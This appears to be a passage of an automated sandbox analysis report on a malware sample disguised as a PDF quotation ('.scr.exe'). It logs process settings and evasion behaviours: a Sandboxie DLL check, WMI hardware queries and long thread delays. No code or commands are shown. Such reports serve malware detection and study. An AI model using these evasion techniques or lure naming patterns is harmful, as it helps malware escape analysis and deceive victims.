                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 5504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5852Thread sleep count: 1042 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599872s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5852Thread sleep count: 8617 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599657s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep count: 40 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599532s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599282s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599157s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -599047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -598079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597829s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -597079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596829s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -596079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595829s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -595079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594829s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -594079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5752Thread sleep time: -593960s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599872Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 593960Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 1042Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 8617Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599872Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 594079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 593960Jump to behavior
